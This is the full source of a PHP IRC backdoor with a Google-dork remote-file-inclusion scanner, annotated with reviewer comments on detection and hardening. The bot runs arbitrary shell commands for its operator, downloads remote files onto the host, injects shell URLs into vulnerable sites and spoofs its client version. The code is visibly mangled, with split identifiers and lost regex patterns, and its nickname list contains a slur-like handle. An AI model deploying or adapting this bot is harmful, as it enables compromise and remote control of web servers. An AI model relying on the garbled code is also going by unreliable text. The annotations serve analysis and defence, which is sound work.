// NOTE(review): this listing is an IRC-controlled PHP backdoor with a
// remote-file-inclusion scanner. The text was mangled in extraction (split
// identifiers such as "$channel _password", altered letter case, lost escape
// sequences), so it does not parse as shown; read it as an analysis sample.
// The settings below are the operator's: the IRC server and port the bot
// connects to, the channel and its key, the controlling nickname, an MD5 hash
// of the login password, the command prefix and the search-result cap.
config//////////////////////////////////////////////////////////////////
$network = ""; IRC Network address//
$port = 6667; IRC Network port//
$channel = ""; IRC channel//
$channel _password = ""; IRC channel password//
$owner = ""; Owners Nickname//
$owner _password = ""; Login password (MD5 encoded)//
$trigger = "."; Bot Trigger//
$max _results = 150; Maximum Google Results//
End config//////////////////////////////////////////////////////////////
// Removes PHP's execution time limit (presumably so the read loop at the end
// of the file can run indefinitely); the @ hides any warning if it is refused.
@set_time_limit (0);
// Builds the bot's IRC nickname: a handle from the fixed list below followed
// by a random number in 1000-9999. Each pass assigns $tmp afresh, so the value
// returned is the one from the last pass.
// Detection: nicknames of the form <listed handle><four digits> are an
// IRC-side indicator for this bot.
function Randname () {
$nickparts = Array ("Gohan", "x4n4r", "C0la", "Mari0", "Johan", "Rex", "R00tz", "Smilee", "Sm4ck", "Nigr", "stench");
$tmp = "";
for ($i =0; $i <2; $i + +) {
$tmp = $nickparts [Mt_rand (0, Count ($nickparts)-1)]. Mt_rand (1000,9999);
}
return $tmp;
}
// Opens the outbound TCP connection to the configured IRC server and aborts
// with the error string on failure.
// Detection: a PHP or web-server process holding a long-lived outbound
// connection to an IRC port (6667 in the config above) is a strong network
// indicator; egress filtering on web hosts blocks the session outright.
$sck = Fsockopen ($network, $port, $errno, $errstr) or Die ("Connection error:". $ERRSTR);
// Writes a "privmsg" line carrying $msg for target $to to the IRC socket.
// Every result the bot reports (command output, download status, scan hits)
// is sent through this function.
function Send ($msg, $to) {
Global $sck, $nick;
Fputs ($sck, "privmsg". $to. " " . $msg. "");
}
// Reads one line from the socket (length argument 1024) and, when its first
// field is "PING", answers with "PONG" plus the second field. Scan() calls
// this between result pages; any other line read here is dropped without
// being parsed for commands.
function Pong () {
Global $sck;
$dat = @fgets ($sck, 1024);
$d = Explode ("", $dat);
if ($d [0] = = "PING") {
Fputs ($sck, "PONG". $d [1]);
}
$dat = "";
}
// Returns the first of the three listed process-execution functions whose
// name does not occur in the disable_functions ini value; returns nothing
// when all three are listed.
// Hardening: when the PHP configuration disables every name in this list the
// probe comes back empty and the "cmd" command has nothing to run with.
function Get_exec_function () {
$exec _functions = Array ("Popen", "exec", "shell_exec");
$disabled _funcs = Ini_get (disable_functions);
foreach ($exec _functions as $f) if (Strpos ($disabled _funcs, $f) = = = False) return $f;
}
// Runs $command through the function named in $exec_function and relays the
// output to $to over IRC: line by line for the popen and exec branches, as a
// single message for shell_exec. $command is the argument text of the
// operator's "cmd" message (see the dispatch in the main loop).
// Detection: process-creation telemetry showing commands spawned by the PHP
// worker or web-server account.
function Execute_command ($exec _function, $command, $to) {
if (! $exec _function) {
Send ("No execution functions ...", $to);
}
Switch ($exec _function) {
Case "Popen": $h = Popen ($command, "R"); while (!feof ($h)) Send (Fgets ($h), $to); Break
Case "EXEC": Exec ($command, $result); foreach ($result as $r) Send ($r, $to); Break
Case "Shell_exec": Send (Shell_exec ($command), $to); Break
}
}
// Fetches $url with file_get_contents and writes the body to the local path
// $out, reporting each failure or "File saved" to $to. Both arguments come
// from the operator's "get" message, so this is the bot's file-drop step.
// Hardening: with allow_url_fopen=Off the remote fetch fails, and a web root
// that the web-server account cannot write to defeats the fopen below.
// Detection: file-integrity monitoring for new files created by that account.
function Get ($url, $out, $to) {
if (! $o = fopen ($out, "w"))
Send ("Unable to write file", $to);
else{
if (! $c = file_get_contents ($url))
Send ("Unable to open remote file", $to);
else{
if (!fwrite ($o, $c))
Send ("Unable to save file", $to);
else{
Send ("File saved", $to);
Fclose ($o);
}
}
}
}
// Encodes the search string before Scan() places it in the query URL: it
// walks the characters of $s, appends a numeric form of each one to $tmp and
// URL-encodes the result.
// NOTE(review): the loop header and the string literals below were damaged in
// extraction, so the exact encoding cannot be recovered from this page.
function Encodedork ($s) {
$tmp = "";
for ($i =0; $i<>
$tmp. = "the". Hexdec (Bin2Hex ($s [$i]). ";";
}
Return UrlEncode ($TMP);
}
// Probes one site for remote file inclusion. It keeps only the host part of
// $url (third "/"-separated field), prefixes "http://" (adding "www." when
// absent), appends $bug, $shell and "??", and requests the result with curl
// (body returned, 4-second timeout). Returns the probe URL when the response
// body contains the marker $search, otherwise false.
// Presumably $bug is the target path and parameter and $shell a remote
// payload URL, going by the usage text in the main loop.
// Defence: the probe only succeeds where request data reaches include or
// require; keep allow_url_include=Off and never build include paths from
// request parameters.
// Detection: access-log entries in which a parameter value is itself an
// http:// URL, here followed by "??".
Function Shellinject ($url, $bug, $shell, $search) {
$url = explode ("/", $url);
$url = $url [2];
$url = (Strpos ($url, "www")!== false? "http://". $url: "http://www." $url). $bug. $shell. "??";
$ch = Curl_init ($url);
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
curl_setopt ($ch, Curlopt_timeout, 4);
$ret = curl_exec ($ch);
$httpcode = Curl_getinfo ($ch, Curlinfo_http_code);
Curl_close ($ch);
// NOTE(review): the status-code comparison lost its right-hand side in extraction.
if ($httpcode = =) {
if (Strpos ($ret, $search)!== false) {
return $url;
}
}
return false;
}
// Drives the scan. It queries Google for $dork, reads a result count from the
// first page and caps it at $max_results, then walks the result pages,
// passing every extracted link to Shellinject() and reporting hits to $to.
// After each page it reports progress and calls Pong() so the IRC session is
// serviced during a long scan. Sends "CURL is not enabled" when curl_init is
// unavailable.
function Scan ($dork, $bug, $shell, $search, $to) {
Global $max _results;
if (function_exists (Curl_init)) {
$ch = Curl_init ("http://www.google.com/search?q=". Encodedork ($dork). "&start=0");
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
$ret = curl_exec ($ch);
Curl_close ($ch);
// Pulls the total from the "of about N" text on the first results page.
Preg_match_all ("/of (about) * ([d,]+)/", $ret, $max);
$max = Str_replace (",", "", $max [2][0]);
$max = $max > $max _results? $max _results: $max;
$i = 0;
while ($i < $max) {
$ch = Curl_init ("http://www.google.com/search?q=". Encodedork ($dork). "&start=". $i);
curl_setopt ($ch, Curlopt_returntransfer, true);
curl_setopt ($ch, Curlopt_header, 0);
$ret = curl_exec ($ch);
// NOTE(review): the link-extraction pattern below was lost in extraction;
// only its tail survives on this page.
Preg_match_all ("/
. *?/", $ret, $links);
if (@ $links [1]) {
foreach ($links [1] as $l) {
$ret = Shellinject ($l, $bug, $shell, $search);
if ($ret! = False) {
Send ("[+] Shell found:". $ret, $to);
}
}
}
else{
Send ("No sites found", $to);
}
Curl_close ($ch);
$i = $max >10? $i +=10: $i + +;
Send ("$i scanned", $to);
Pong ();
}
}
else{
Send ("CURL is not enabled", $to);
}
}
// Main session: registers on the IRC server under a random nickname, then
// reads server lines until the socket closes, answering keep-alives and
// dispatching operator commands.
$nick = Randname ();
Sleep (1);
// Registration uses the generated nick for the user name and a
// <nick>@hotmail.com string as the real-name field.
Fputs ($sck, "USER".) $nick. " ? * " . $nick. "@hotmail. com");
Sleep (1);
Fputs ($sck, "NICK". $nick. "");
$loggedin = false;
while (!feof ($sck)) {
$dat = Fgets ($sck, 4096);
$d = Explode ("", $dat);
// Captures sender nick, sender host, target, command word and arguments from
// messages that start with the configured trigger.
Preg_match_all ("/:(. +)! (.+) Privmsg (. +): $trigger (w+) s* (. +) */", $dat, $cmd);
if ($d [0] = = "PING") {
Fputs ($sck, "PONG". $d [1]);
}
// Joins the configured channel (with its key) once the server sends a line
// containing "help REGISTER".
if (Strpos ($dat, "help REGISTER")!== false) {
Fputs ($sck, "JOIN". $channel. " " . $channel _password. "");
}
// Answers VERSION queries with a fixed mIRC v6.3 string, so the client
// identity reported over IRC is not evidence of what is actually running.
if (Preg_match ("/:(. +)!. + privmsg. +:. VERSION (.) /", $dat, $v)) {
Fputs ($sck, "NOTICE". $v [1]. " " . $v [2]. "VERSION MIRC v6.3 Khaled Mardam-bey". $v [2]. "");
}
if (@ $cmd [4][0]) {
$from = $cmd [1][0];
$from _host = $cmd [2][0];
// Replies go to the sender when the bot was addressed directly, otherwise to
// the channel the message arrived on.
$to = $cmd [3][0] = = $nick? $cmd [1][0]: $cmd [3][0];
$command = $cmd [4][0];
$args = $cmd [5][0];
// Commands are accepted only from the nickname in $owner after a successful
// login during this session.
if ($from = = $owner && $loggedin = = True) {
Switch ($command) {
// Command set: run a shell command, quit, download a file, report host and
// account, send a raw IRC line, start an RFI scan, echo text.
Case "cmd": Execute_command (Get_exec_function (), $args, $to); Break
Case ' die ': fputs ($sck, "quit:received die from". $from); Die ();
Case "get": $a = Explode ("", $args); Get ($a [0], $a [1], $to); Break
Case "INF": Send ("Host:".) $_server[http_host]. "Whoami:". @exec (WhoAmI), $to); Break
Case "Raw": fputs ($sck, $args. ""); Break
Case "RFI": $a = Explode ("", $args);
// The scan needs four arguments; otherwise the usage text is sent instead.
if (count ($a) > 3) {Send ("Beginning RFI Scan", $to), scan ($a [0], $a [1], $a [2], $a [3], $to); Send ("RFI scan complete", $to );}
else Send ("Usage: (dork) (bug) (shell) (search)", $to);
Break
Case "say": Send ($args, $to); Break
Default:send ("Unknown command.", $to);
}
}
// Before login the only recognised command is the login itself: the MD5 of
// the supplied text is compared with the configured hash.
ElseIf ($from = = $owner && $loggedin = = False) {
if ($command = = "Login") {
if (MD5 ($args) = = $owner _password) {
$loggedin = true;
Send ("User $from successfully logged in.", $to);
}
else{
Send ("Login failed.", $to);
}
}
}
}
$dat = "";
}
?>
Credits Flyz To:array ("Gohan", "x4n4r", "C0la", "Mari0", "Johan", "Rex", "R00tz", "Smilee", "Sm4ck", "Nigr", "stench");
Has fun. =)